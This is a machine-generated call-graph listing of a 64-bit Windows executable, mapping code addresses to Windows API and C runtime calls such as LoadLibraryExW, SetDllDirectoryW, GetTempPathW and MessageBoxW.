16661->16664 16663->16641 16667 7ff714c83d0b 16664->16667 16665 7ff714c83dbc 16914 7ff714c89390 16665->16914 16667->16669 16670 7ff714c83d12 16667->16670 16669->16665 16671 7ff714c83da7 LoadLibraryExW 16669->16671 16673 7ff714c82710 54 API calls 16670->16673 16671->16665 16672 7ff714c83dcf SetDllDirectoryW 16675 7ff714c83e02 16672->16675 16717 7ff714c83e52 16672->16717 16673->16641 16676 7ff714c88830 14 API calls 16675->16676 16684 7ff714c83e0e __std_exception_copy 16676->16684 16677 7ff714c84000 16678 7ff714c8402d 16677->16678 16679 7ff714c8400a PostMessageW GetMessageW 16677->16679 17069 7ff714c83360 16678->17069 16679->16678 16680 7ff714c83f13 16919 7ff714c833c0 16680->16919 16687 7ff714c83eea 16684->16687 16691 7ff714c83e46 16684->16691 16690 7ff714c88940 40 API calls 16687->16690 16690->16717 16691->16717 16995 7ff714c86dc0 16691->16995 16717->16677 16717->16680 16728 7ff714c99b64 16727->16728 16729 7ff714c99b43 16727->16729 16730 7ff714c9a3d8 45 API calls 16728->16730 16729->16573 16731 7ff714c99b69 16730->16731 16733 7ff714c8d2c9 16732->16733 16733->16581 16736 7ff714c8cfa1 16734->16736 16735 7ff714c8cd60 16735->16572 16736->16735 16737 7ff714c8d888 7 API calls 16736->16737 16737->16735 16739 7ff714c8d152 _isindst __scrt_get_show_window_mode 16738->16739 16740 7ff714c8d171 RtlCaptureContext RtlLookupFunctionEntry 16739->16740 16741 7ff714c8d1d6 __scrt_get_show_window_mode 16740->16741 16742 7ff714c8d19a RtlVirtualUnwind 16740->16742 16743 7ff714c8d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16741->16743 16742->16741 16744 7ff714c8d256 _isindst 16743->16744 16744->16569 16746 7ff714c8d890 16745->16746 16747 7ff714c8d89a 16745->16747 16751 7ff714c8dc24 16746->16751 16747->16587 16752 7ff714c8d895 16751->16752 16753 7ff714c8dc33 16751->16753 16755 7ff714c8dc90 16752->16755 16759 7ff714c8de60 16753->16759 16756 7ff714c8dcbb 16755->16756 16757 7ff714c8dcbf 16756->16757 16758 7ff714c8dc9e DeleteCriticalSection 16756->16758 16757->16747 16758->16756 16763 7ff714c8dcc8 16759->16763 16764 7ff714c8ddb2 TlsFree 16763->16764 16770 7ff714c8dd0c __vcrt_FlsAlloc 16763->16770 16765 7ff714c8dd3a LoadLibraryExW 16767 7ff714c8ddd9 16765->16767 16768 7ff714c8dd5b GetLastError 16765->16768 16766 7ff714c8ddf9 GetProcAddress 16766->16764 16767->16766 16769 7ff714c8ddf0 FreeLibrary 16767->16769 16768->16770 16769->16766 16770->16764 16770->16765 16770->16766 16771 7ff714c8dd7d LoadLibraryExW 16770->16771 16771->16767 16771->16770 16775 7ff714c9f480 16772->16775 16773 7ff714c9f4d3 16774 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 16773->16774 16778 7ff714c9f4fc 16774->16778 16775->16773 16776 7ff714c9f526 16775->16776 17082 7ff714c9f358 16776->17082 16778->16596 17090 7ff714c8c850 16779->17090 16782 7ff714c836eb GetLastError 17097 7ff714c82c50 16782->17097 16783 7ff714c83710 17092 7ff714c89280 FindFirstFileExW 16783->17092 16787 7ff714c8377d 17123 7ff714c89440 16787->17123 16788 7ff714c83723 17112 7ff714c89300 CreateFileW 16788->17112 16790 7ff714c8c550 _log10_special 8 API calls 16793 7ff714c837b5 16790->16793 16792 7ff714c8378b 16797 7ff714c82810 49 API calls 16792->16797 16799 7ff714c83706 16792->16799 16793->16641 16801 7ff714c81950 16793->16801 16795 7ff714c8374c __vcrt_FlsAlloc 16795->16787 16796 7ff714c83734 17115 7ff714c82810 16796->17115 16797->16799 16799->16790 16802 7ff714c845c0 108 API calls 16801->16802 16803 7ff714c81985 16802->16803 16804 7ff714c81c43 16803->16804 16805 7ff714c87f90 83 API calls 16803->16805 16806 7ff714c8c550 _log10_special 8 API calls 16804->16806 16807 7ff714c819cb 16805->16807 16808 7ff714c81c5e 16806->16808 16850 7ff714c81a03 16807->16850 17480 7ff714c906d4 16807->17480 16808->16602 16808->16603 16810 7ff714c9004c 74 API calls 16810->16804 16811 7ff714c819e5 16812 7ff714c819e9 16811->16812 16813 7ff714c81a08 16811->16813 16815 7ff714c94f08 _set_fmode 11 API calls 16812->16815 17484 7ff714c9039c 16813->17484 16817 7ff714c819ee 16815->16817 17487 7ff714c82910 16817->17487 16818 7ff714c81a26 16820 7ff714c94f08 _set_fmode 11 API calls 16818->16820 16821 7ff714c81a2b 16820->16821 16823 7ff714c82910 54 API calls 16821->16823 16822 7ff714c81a45 16824 7ff714c81a5c 16822->16824 16825 7ff714c81a7b 16822->16825 16823->16850 16827 7ff714c94f08 _set_fmode 11 API calls 16824->16827 16826 7ff714c81c80 49 API calls 16825->16826 16828 7ff714c81a92 16826->16828 16829 7ff714c81a61 16827->16829 16830 7ff714c81c80 49 API calls 16828->16830 16831 7ff714c82910 54 API calls 16829->16831 16832 7ff714c81add 16830->16832 16831->16850 16833 7ff714c906d4 73 API calls 16832->16833 16834 7ff714c81b01 16833->16834 16835 7ff714c81b16 16834->16835 16836 7ff714c81b35 16834->16836 16837 7ff714c94f08 _set_fmode 11 API calls 16835->16837 16838 7ff714c9039c _fread_nolock 53 API calls 16836->16838 16839 7ff714c81b1b 16837->16839 16840 7ff714c81b4a 16838->16840 16843 7ff714c82910 54 API calls 16839->16843 16841 7ff714c81b50 16840->16841 16842 7ff714c81b6f 16840->16842 16844 7ff714c94f08 _set_fmode 11 API calls 16841->16844 17502 7ff714c90110 16842->17502 16843->16850 16846 7ff714c81b55 16844->16846 16848 7ff714c82910 54 API calls 16846->16848 16848->16850 16849 7ff714c82710 54 API calls 16849->16850 16850->16810 16852 7ff714c8883a 16851->16852 16853 7ff714c89390 2 API calls 16852->16853 16854 7ff714c88859 GetEnvironmentVariableW 16853->16854 16855 7ff714c888c2 16854->16855 16856 7ff714c88876 ExpandEnvironmentStringsW 16854->16856 16857 7ff714c8c550 _log10_special 8 API calls 16855->16857 16856->16855 16858 7ff714c88898 16856->16858 16859 7ff714c888d4 16857->16859 16860 7ff714c89440 2 API calls 16858->16860 16859->16612 16861 7ff714c888aa 16860->16861 16862 7ff714c8c550 _log10_special 8 API calls 16861->16862 16863 7ff714c888ba 16862->16863 16863->16612 16865 7ff714c890f5 16864->16865 17720 7ff714c88570 GetCurrentProcess OpenProcessToken 16865->17720 16868 7ff714c88570 7 API calls 16869 7ff714c89121 16868->16869 16870 7ff714c89154 16869->16870 16871 7ff714c8913a 16869->16871 16872 7ff714c826b0 48 API calls 16870->16872 16873 7ff714c826b0 48 API calls 16871->16873 16875 7ff714c89167 LocalFree LocalFree 16872->16875 16874 7ff714c89152 16873->16874 16874->16875 16876 7ff714c89183 16875->16876 16878 7ff714c8918f 16875->16878 17730 7ff714c82b50 16876->17730 16879 7ff714c8c550 _log10_special 8 API calls 16878->16879 16880 7ff714c83c55 16879->16880 16880->16658 16881 7ff714c88660 16880->16881 16882 7ff714c88678 16881->16882 16883 7ff714c886fa GetTempPathW GetCurrentProcessId 16882->16883 16884 7ff714c8869c 16882->16884 17739 7ff714c825c0 16883->17739 16886 7ff714c88830 14 API calls 16884->16886 16887 7ff714c886a8 16886->16887 17746 7ff714c881d0 16887->17746 16897 7ff714c88728 __std_exception_copy 16900 7ff714c88765 __std_exception_copy 16897->16900 17743 7ff714c98b68 16897->17743 16905 7ff714c89390 2 API calls 16900->16905 16913 7ff714c887d4 __std_exception_copy 16900->16913 16906 7ff714c887b1 16905->16906 16915 7ff714c893b2 MultiByteToWideChar 16914->16915 16918 7ff714c893d6 16914->16918 16917 7ff714c893ec __std_exception_copy 16915->16917 16915->16918 16916 7ff714c893f3 MultiByteToWideChar 16916->16917 16917->16672 16918->16916 16918->16917 16931 7ff714c833ce __scrt_get_show_window_mode 16919->16931 16920 7ff714c8c550 _log10_special 8 API calls 16922 7ff714c83664 16920->16922 16921 7ff714c835c7 16921->16920 16922->16641 16938 7ff714c890c0 LocalFree 16922->16938 16924 7ff714c81c80 49 API calls 16924->16931 16925 7ff714c835e2 16927 7ff714c82710 54 API calls 16925->16927 16927->16921 16930 7ff714c835c9 16933 7ff714c82710 54 API calls 16930->16933 16931->16921 16931->16924 16931->16925 16931->16930 16932 7ff714c82a50 54 API calls 16931->16932 16936 7ff714c835d0 16931->16936 17935 7ff714c84560 16931->17935 17941 7ff714c87e20 16931->17941 17952 7ff714c81600 16931->17952 18000 7ff714c87120 16931->18000 18004 7ff714c84190 16931->18004 18048 7ff714c84450 16931->18048 16932->16931 16933->16921 16937 7ff714c82710 54 API calls 16936->16937 16937->16921 16940 7ff714c81ca5 16939->16940 16941 7ff714c94984 49 API calls 16940->16941 16942 7ff714c81cc8 16941->16942 16942->16607 16944 7ff714c89390 2 API calls 16943->16944 16945 7ff714c889b4 16944->16945 16946 7ff714c98238 38 API calls 16945->16946 16947 7ff714c889c6 __std_exception_copy 16946->16947 16947->16621 16949 7ff714c845cc 16948->16949 16950 7ff714c89390 2 API calls 16949->16950 16951 7ff714c845f4 16950->16951 16952 7ff714c89390 2 API calls 16951->16952 16953 7ff714c84607 16952->16953 18215 7ff714c95f94 16953->18215 16956 7ff714c8c550 _log10_special 8 API calls 16957 7ff714c8392b 16956->16957 16957->16610 16958 7ff714c87f90 16957->16958 16959 7ff714c87fb4 16958->16959 16960 7ff714c906d4 73 API calls 16959->16960 16965 7ff714c8808b __std_exception_copy 16959->16965 16961 7ff714c87fd0 16960->16961 16961->16965 18606 7ff714c978c8 16961->18606 16963 7ff714c906d4 73 API calls 16966 7ff714c87fe5 16963->16966 16964 7ff714c9039c _fread_nolock 53 API calls 16964->16966 16965->16614 16966->16963 16966->16964 16966->16965 16968 7ff714c9007c 16967->16968 18621 7ff714c8fe28 16968->18621 16970 7ff714c90095 16970->16610 16972 7ff714c8c850 16971->16972 16973 7ff714c82734 GetCurrentProcessId 16972->16973 16974 7ff714c81c80 49 API calls 16973->16974 16975 7ff714c82787 16974->16975 16976 7ff714c94984 49 API calls 16975->16976 16977 7ff714c827cf 16976->16977 16978 7ff714c82620 12 API calls 16977->16978 16979 7ff714c827f1 16978->16979 16980 7ff714c8c550 _log10_special 8 API calls 16979->16980 16981 7ff714c82801 16980->16981 16981->16641 16983 7ff714c89390 2 API calls 16982->16983 16984 7ff714c8895c 16983->16984 16985 7ff714c89390 2 API calls 16984->16985 16986 7ff714c8896c 16985->16986 16987 7ff714c98238 38 API calls 16986->16987 16988 7ff714c8897a __std_exception_copy 16987->16988 16988->16624 16990 7ff714c81c80 49 API calls 16989->16990 16991 7ff714c844fd 16990->16991 16991->16652 16993 7ff714c81c80 49 API calls 16992->16993 16994 7ff714c84660 16993->16994 16994->16669 16996 7ff714c86dd5 16995->16996 16997 7ff714c83e64 16996->16997 16998 7ff714c94f08 _set_fmode 11 API calls 16996->16998 17001 7ff714c87340 16997->17001 16999 7ff714c86de2 16998->16999 17000 7ff714c82910 54 API calls 16999->17000 17000->16997 18632 7ff714c81470 17001->18632 18738 7ff714c86360 17069->18738 17089 7ff714c9546c EnterCriticalSection 17082->17089 17091 7ff714c836bc GetModuleFileNameW 17090->17091 17091->16782 17091->16783 17093 7ff714c892bf FindClose 17092->17093 17094 7ff714c892d2 17092->17094 17093->17094 17095 7ff714c8c550 _log10_special 8 API calls 17094->17095 17096 7ff714c8371a 17095->17096 17096->16787 17096->16788 17098 7ff714c8c850 17097->17098 17099 7ff714c82c70 GetCurrentProcessId 17098->17099 17128 7ff714c826b0 17099->17128 17101 7ff714c82cb9 17132 7ff714c94bd8 17101->17132 17104 7ff714c826b0 48 API calls 17105 7ff714c82d34 FormatMessageW 17104->17105 17107 7ff714c82d6d 17105->17107 17108 7ff714c82d7f MessageBoxW 17105->17108 17109 7ff714c826b0 48 API calls 17107->17109 17110 7ff714c8c550 _log10_special 8 API calls 17108->17110 17109->17108 17111 7ff714c82daf 17110->17111 17111->16799 17113 7ff714c89340 GetFinalPathNameByHandleW CloseHandle 17112->17113 17114 7ff714c83730 17112->17114 17113->17114 17114->16795 17114->16796 17116 7ff714c82834 17115->17116 17117 7ff714c826b0 48 API calls 17116->17117 17118 7ff714c82887 17117->17118 17119 7ff714c94bd8 48 API calls 17118->17119 17120 7ff714c828d0 MessageBoxW 17119->17120 17121 7ff714c8c550 _log10_special 8 API calls 17120->17121 17122 7ff714c82900 17121->17122 17122->16799 17124 7ff714c89495 17123->17124 17125 7ff714c8946a WideCharToMultiByte 17123->17125 17126 7ff714c894b2 WideCharToMultiByte 17124->17126 17127 7ff714c894ab __std_exception_copy 17124->17127 17125->17124 17125->17127 17126->17127 17127->16792 17129 7ff714c826d5 17128->17129 17130 7ff714c94bd8 48 API calls 17129->17130 17131 7ff714c826f8 17130->17131 17131->17101 17134 7ff714c94c32 17132->17134 17133 7ff714c94c57 17135 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17133->17135 17134->17133 17136 7ff714c94c93 17134->17136 17139 7ff714c94c81 17135->17139 17150 7ff714c92f90 17136->17150 17140 7ff714c8c550 _log10_special 8 API calls 17139->17140 17142 7ff714c82d04 17140->17142 17141 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17141->17139 17142->17104 17143 7ff714c94d74 17143->17141 17144 7ff714c94d49 17148 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17144->17148 17145 7ff714c94d9a 17145->17143 17147 7ff714c94da4 17145->17147 17146 7ff714c94d40 17146->17143 17146->17144 17149 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17147->17149 17148->17139 17149->17139 17151 7ff714c92fce 17150->17151 17152 7ff714c92fbe 17150->17152 17153 7ff714c92fd7 17151->17153 17157 7ff714c93005 17151->17157 17156 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17152->17156 17154 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17153->17154 17155 7ff714c92ffd 17154->17155 17155->17143 17155->17144 17155->17145 17155->17146 17156->17155 17157->17152 17157->17155 17161 7ff714c939a4 17157->17161 17194 7ff714c933f0 17157->17194 17231 7ff714c92b80 17157->17231 17162 7ff714c939e6 17161->17162 17163 7ff714c93a57 17161->17163 17166 7ff714c93a81 17162->17166 17167 7ff714c939ec 17162->17167 17164 7ff714c93ab0 17163->17164 17165 7ff714c93a5c 17163->17165 17173 7ff714c93ac7 17164->17173 17174 7ff714c93aba 17164->17174 17179 7ff714c93abf 17164->17179 17168 7ff714c93a91 17165->17168 17169 7ff714c93a5e 17165->17169 17254 7ff714c91d54 17166->17254 17170 7ff714c93a20 17167->17170 17171 7ff714c939f1 17167->17171 17261 7ff714c91944 17168->17261 17172 7ff714c93a00 17169->17172 17181 7ff714c93a6d 17169->17181 17176 7ff714c939f7 17170->17176 17170->17179 17171->17173 17171->17176 17192 7ff714c93af0 17172->17192 17234 7ff714c94158 17172->17234 17268 7ff714c946ac 17173->17268 17174->17166 17174->17179 17176->17172 17182 7ff714c93a32 17176->17182 17189 7ff714c93a1b 17176->17189 17179->17192 17272 7ff714c92164 17179->17272 17181->17166 17184 7ff714c93a72 17181->17184 17182->17192 17244 7ff714c94494 17182->17244 17184->17192 17250 7ff714c94558 17184->17250 17186 7ff714c8c550 _log10_special 8 API calls 17188 7ff714c93dea 17186->17188 17188->17157 17189->17192 17193 7ff714c93cdc 17189->17193 17279 7ff714c947c0 17189->17279 17192->17186 17193->17192 17285 7ff714c9ea08 17193->17285 17195 7ff714c93414 17194->17195 17196 7ff714c933fe 17194->17196 17197 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17195->17197 17198 7ff714c93454 17195->17198 17196->17198 17199 7ff714c939e6 17196->17199 17200 7ff714c93a57 17196->17200 17197->17198 17198->17157 17203 7ff714c93a81 17199->17203 17204 7ff714c939ec 17199->17204 17201 7ff714c93ab0 17200->17201 17202 7ff714c93a5c 17200->17202 17210 7ff714c93ac7 17201->17210 17211 7ff714c93aba 17201->17211 17216 7ff714c93abf 17201->17216 17205 7ff714c93a91 17202->17205 17206 7ff714c93a5e 17202->17206 17212 7ff714c91d54 38 API calls 17203->17212 17207 7ff714c93a20 17204->17207 17208 7ff714c939f1 17204->17208 17214 7ff714c91944 38 API calls 17205->17214 17209 7ff714c93a00 17206->17209 17218 7ff714c93a6d 17206->17218 17213 7ff714c939f7 17207->17213 17207->17216 17208->17210 17208->17213 17215 7ff714c94158 47 API calls 17209->17215 17228 7ff714c93af0 17209->17228 17217 7ff714c946ac 45 API calls 17210->17217 17211->17203 17211->17216 17226 7ff714c93a1b 17212->17226 17213->17209 17219 7ff714c93a32 17213->17219 17213->17226 17214->17226 17215->17226 17220 7ff714c92164 38 API calls 17216->17220 17216->17228 17217->17226 17218->17203 17221 7ff714c93a72 17218->17221 17222 7ff714c94494 46 API calls 17219->17222 17219->17228 17220->17226 17224 7ff714c94558 37 API calls 17221->17224 17221->17228 17222->17226 17223 7ff714c8c550 _log10_special 8 API calls 17225 7ff714c93dea 17223->17225 17224->17226 17225->17157 17227 7ff714c93cdc 17226->17227 17226->17228 17229 7ff714c947c0 45 API calls 17226->17229 17227->17228 17230 7ff714c9ea08 46 API calls 17227->17230 17228->17223 17229->17227 17230->17227 17463 7ff714c90fc8 17231->17463 17235 7ff714c9417e 17234->17235 17297 7ff714c90b80 17235->17297 17240 7ff714c947c0 45 API calls 17242 7ff714c942c3 17240->17242 17241 7ff714c947c0 45 API calls 17243 7ff714c94351 17241->17243 17242->17241 17242->17242 17242->17243 17243->17189 17245 7ff714c944c9 17244->17245 17246 7ff714c944e7 17245->17246 17247 7ff714c947c0 45 API calls 17245->17247 17249 7ff714c9450e 17245->17249 17248 7ff714c9ea08 46 API calls 17246->17248 17247->17246 17248->17249 17249->17189 17253 7ff714c94579 17250->17253 17251 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17252 7ff714c945aa 17251->17252 17252->17189 17253->17251 17253->17252 17255 7ff714c91d87 17254->17255 17256 7ff714c91db6 17255->17256 17258 7ff714c91e73 17255->17258 17260 7ff714c91df3 17256->17260 17433 7ff714c90c28 17256->17433 17259 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17258->17259 17259->17260 17260->17189 17262 7ff714c91977 17261->17262 17263 7ff714c919a6 17262->17263 17265 7ff714c91a63 17262->17265 17264 7ff714c90c28 12 API calls 17263->17264 17267 7ff714c919e3 17263->17267 17264->17267 17266 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17265->17266 17266->17267 17267->17189 17269 7ff714c946ef 17268->17269 17271 7ff714c946f3 __crtLCMapStringW 17269->17271 17441 7ff714c94748 17269->17441 17271->17189 17273 7ff714c92197 17272->17273 17274 7ff714c921c6 17273->17274 17276 7ff714c92283 17273->17276 17275 7ff714c90c28 12 API calls 17274->17275 17278 7ff714c92203 17274->17278 17275->17278 17277 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17276->17277 17277->17278 17278->17189 17280 7ff714c947d7 17279->17280 17445 7ff714c9d9b8 17280->17445 17286 7ff714c9ea39 17285->17286 17294 7ff714c9ea47 17285->17294 17287 7ff714c9ea67 17286->17287 17288 7ff714c947c0 45 API calls 17286->17288 17286->17294 17289 7ff714c9ea9f 17287->17289 17290 7ff714c9ea78 17287->17290 17288->17287 17292 7ff714c9eb2a 17289->17292 17293 7ff714c9eac9 17289->17293 17289->17294 17453 7ff714ca00a0 17290->17453 17295 7ff714c9f8a0 _fread_nolock MultiByteToWideChar 17292->17295 17293->17294 17456 7ff714c9f8a0 17293->17456 17294->17193 17295->17294 17298 7ff714c90bb7 17297->17298 17304 7ff714c90ba6 17297->17304 17299 7ff714c9d5fc _fread_nolock 12 API calls 17298->17299 17298->17304 17300 7ff714c90be4 17299->17300 17301 7ff714c90bf8 17300->17301 17302 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17300->17302 17303 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17301->17303 17302->17301 17303->17304 17305 7ff714c9e570 17304->17305 17306 7ff714c9e5c0 17305->17306 17307 7ff714c9e58d 17305->17307 17306->17307 17309 7ff714c9e5f2 17306->17309 17308 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17307->17308 17317 7ff714c942a1 17308->17317 17313 7ff714c9e705 17309->17313 17320 7ff714c9e63a 17309->17320 17310 7ff714c9e7f7 17360 7ff714c9da5c 17310->17360 17312 7ff714c9e7bd 17353 7ff714c9ddf4 17312->17353 17313->17310 17313->17312 17314 7ff714c9e78c 17313->17314 17316 7ff714c9e74f 17313->17316 17319 7ff714c9e745 17313->17319 17346 7ff714c9e0d4 17314->17346 17336 7ff714c9e304 17316->17336 17317->17240 17317->17242 17319->17312 17322 7ff714c9e74a 17319->17322 17320->17317 17327 7ff714c9a4a4 17320->17327 17322->17314 17322->17316 17325 7ff714c9a900 _isindst 17 API calls 17326 7ff714c9e854 17325->17326 17328 7ff714c9a4b1 17327->17328 17329 7ff714c9a4bb 17327->17329 17328->17329 17333 7ff714c9a4d6 17328->17333 17330 7ff714c94f08 _set_fmode 11 API calls 17329->17330 17335 7ff714c9a4c2 17330->17335 17331 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 17332 7ff714c9a4ce 17331->17332 17332->17317 17332->17325 17333->17332 17334 7ff714c94f08 _set_fmode 11 API calls 17333->17334 17334->17335 17335->17331 17369 7ff714ca40ac 17336->17369 17340 7ff714c9e3ac 17341 7ff714c9e401 17340->17341 17343 7ff714c9e3cc 17340->17343 17345 7ff714c9e3b0 17340->17345 17422 7ff714c9def0 17341->17422 17343->17343 17418 7ff714c9e1ac 17343->17418 17345->17317 17347 7ff714ca40ac 38 API calls 17346->17347 17348 7ff714c9e11e 17347->17348 17349 7ff714ca3af4 37 API calls 17348->17349 17350 7ff714c9e16e 17349->17350 17351 7ff714c9e172 17350->17351 17352 7ff714c9e1ac 45 API calls 17350->17352 17351->17317 17352->17351 17354 7ff714ca40ac 38 API calls 17353->17354 17355 7ff714c9de3f 17354->17355 17356 7ff714ca3af4 37 API calls 17355->17356 17357 7ff714c9de97 17356->17357 17358 7ff714c9de9b 17357->17358 17359 7ff714c9def0 45 API calls 17357->17359 17358->17317 17359->17358 17361 7ff714c9daa1 17360->17361 17362 7ff714c9dad4 17360->17362 17363 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17361->17363 17364 7ff714c9daec 17362->17364 17367 7ff714c9db6d 17362->17367 17366 7ff714c9dacd __scrt_get_show_window_mode 17363->17366 17365 7ff714c9ddf4 46 API calls 17364->17365 17365->17366 17366->17317 17367->17366 17368 7ff714c947c0 45 API calls 17367->17368 17368->17366 17370 7ff714ca40ff fegetenv 17369->17370 17371 7ff714ca7e2c 37 API calls 17370->17371 17376 7ff714ca4152 17371->17376 17372 7ff714ca417f 17375 7ff714c9a4a4 __std_exception_copy 37 API calls 17372->17375 17373 7ff714ca4242 17374 7ff714ca7e2c 37 API calls 17373->17374 17377 7ff714ca426c 17374->17377 17378 7ff714ca41fd 17375->17378 17376->17373 17379 7ff714ca416d 17376->17379 17380 7ff714ca421c 17376->17380 17381 7ff714ca7e2c 37 API calls 17377->17381 17382 7ff714ca5324 17378->17382 17388 7ff714ca4205 17378->17388 17379->17372 17379->17373 17383 7ff714c9a4a4 __std_exception_copy 37 API calls 17380->17383 17384 7ff714ca427d 17381->17384 17385 7ff714c9a900 _isindst 17 API calls 17382->17385 17383->17378 17386 7ff714ca8020 20 API calls 17384->17386 17387 7ff714ca5339 17385->17387 17393 7ff714ca42e6 __scrt_get_show_window_mode 17386->17393 17389 7ff714c8c550 _log10_special 8 API calls 17388->17389 17390 7ff714c9e351 17389->17390 17414 7ff714ca3af4 17390->17414 17391 7ff714ca468f __scrt_get_show_window_mode 17392 7ff714ca4327 memcpy_s 17408 7ff714ca4c6b memcpy_s __scrt_get_show_window_mode 17392->17408 17413 7ff714ca4783 memcpy_s __scrt_get_show_window_mode 17392->17413 17393->17391 17393->17392 17398 7ff714c94f08 _set_fmode 11 API calls 17393->17398 17394 7ff714ca3c10 37 API calls 17400 7ff714ca50e7 17394->17400 17395 7ff714ca49cf 17395->17394 17396 7ff714ca533c memcpy_s 37 API calls 17396->17395 17397 7ff714ca497b 17397->17395 17397->17396 17399 7ff714ca4760 17398->17399 17401 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 17399->17401 17403 7ff714ca533c memcpy_s 37 API calls 17400->17403 17407 7ff714ca5142 17400->17407 17401->17392 17402 7ff714ca52c8 17406 7ff714ca7e2c 37 API calls 17402->17406 17403->17407 17404 7ff714c94f08 11 API calls _set_fmode 17404->17408 17405 7ff714c94f08 11 API calls _set_fmode 17405->17413 17406->17388 17407->17402 17409 7ff714ca3c10 37 API calls 17407->17409 17411 7ff714ca533c memcpy_s 37 API calls 17407->17411 17408->17395 17408->17397 17408->17404 17412 7ff714c9a8e0 37 API calls _invalid_parameter_noinfo 17408->17412 17409->17407 17410 7ff714c9a8e0 37 API calls _invalid_parameter_noinfo 17410->17413 17411->17407 17412->17408 17413->17397 17413->17405 17413->17410 17415 7ff714ca3b13 17414->17415 17416 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17415->17416 17417 7ff714ca3b3e memcpy_s 17415->17417 17416->17417 17417->17340 17419 7ff714c9e1d8 memcpy_s 17418->17419 17420 7ff714c947c0 45 API calls 17419->17420 17421 7ff714c9e292 memcpy_s __scrt_get_show_window_mode 17419->17421 17420->17421 17421->17345 17423 7ff714c9df2b 17422->17423 17427 7ff714c9df78 memcpy_s 17422->17427 17424 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17423->17424 17425 7ff714c9df57 17424->17425 17425->17345 17426 7ff714c9dfe3 17428 7ff714c9a4a4 __std_exception_copy 37 API calls 17426->17428 17427->17426 17429 7ff714c947c0 45 API calls 17427->17429 17432 7ff714c9e025 memcpy_s 17428->17432 17429->17426 17430 7ff714c9a900 _isindst 17 API calls 17431 7ff714c9e0d0 17430->17431 17432->17430 17434 7ff714c90c4e 17433->17434 17435 7ff714c90c5f 17433->17435 17434->17260 17435->17434 17436 7ff714c9d5fc _fread_nolock 12 API calls 17435->17436 17437 7ff714c90c90 17436->17437 17438 7ff714c90ca4 17437->17438 17440 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17437->17440 17439 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17438->17439 17439->17434 17440->17438 17442 7ff714c94766 17441->17442 17443 7ff714c9476e 17441->17443 17444 7ff714c947c0 45 API calls 17442->17444 17443->17271 17444->17443 17446 7ff714c9d9d1 17445->17446 17447 7ff714c947ff 17445->17447 17446->17447 17448 7ff714ca3304 45 API calls 17446->17448 17449 7ff714c9da24 17447->17449 17448->17447 17450 7ff714c9480f 17449->17450 17451 7ff714c9da3d 17449->17451 17450->17193 17451->17450 17452 7ff714ca2650 45 API calls 17451->17452 17452->17450 17459 7ff714ca6d88 17453->17459 17458 7ff714c9f8a9 MultiByteToWideChar 17456->17458 17462 7ff714ca6dec 17459->17462 17460 7ff714c8c550 _log10_special 8 API calls 17461 7ff714ca00bd 17460->17461 17461->17294 17462->17460 17464 7ff714c9100f 17463->17464 17465 7ff714c90ffd 17463->17465 17468 7ff714c9101d 17464->17468 17471 7ff714c91059 17464->17471 17466 7ff714c94f08 _set_fmode 11 API calls 17465->17466 17467 7ff714c91002 17466->17467 17469 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 17467->17469 17470 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17468->17470 17479 7ff714c9100d 17469->17479 17470->17479 17472 7ff714c913d5 17471->17472 17474 7ff714c94f08 _set_fmode 11 API calls 17471->17474 17473 7ff714c94f08 _set_fmode 11 API calls 17472->17473 17472->17479 17475 7ff714c91669 17473->17475 17476 7ff714c913ca 17474->17476 17477 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 17475->17477 17478 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 17476->17478 17477->17479 17478->17472 17479->17157 17481 7ff714c90704 17480->17481 17508 7ff714c90464 17481->17508 17483 7ff714c9071d 17483->16811 17520 7ff714c903bc 17484->17520 17488 7ff714c8c850 17487->17488 17489 7ff714c82930 GetCurrentProcessId 17488->17489 17490 7ff714c81c80 49 API calls 17489->17490 17491 7ff714c82979 17490->17491 17534 7ff714c94984 17491->17534 17496 7ff714c81c80 49 API calls 17497 7ff714c829ff 17496->17497 17564 7ff714c82620 17497->17564 17500 7ff714c8c550 _log10_special 8 API calls 17501 7ff714c82a31 17500->17501 17501->16850 17503 7ff714c90119 17502->17503 17504 7ff714c81b89 17502->17504 17505 7ff714c94f08 _set_fmode 11 API calls 17503->17505 17504->16849 17504->16850 17506 7ff714c9011e 17505->17506 17507 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 17506->17507 17507->17504 17509 7ff714c904ce 17508->17509 17510 7ff714c9048e 17508->17510 17509->17510 17511 7ff714c904da 17509->17511 17512 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17510->17512 17519 7ff714c9546c EnterCriticalSection 17511->17519 17518 7ff714c904b5 17512->17518 17518->17483 17521 7ff714c903e6 17520->17521 17532 7ff714c81a20 17520->17532 17522 7ff714c90432 17521->17522 17525 7ff714c903f5 __scrt_get_show_window_mode 17521->17525 17521->17532 17533 7ff714c9546c EnterCriticalSection 17522->17533 17526 7ff714c94f08 _set_fmode 11 API calls 17525->17526 17528 7ff714c9040a 17526->17528 17529 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 17528->17529 17529->17532 17532->16818 17532->16822 17535 7ff714c949de 17534->17535 17536 7ff714c94a03 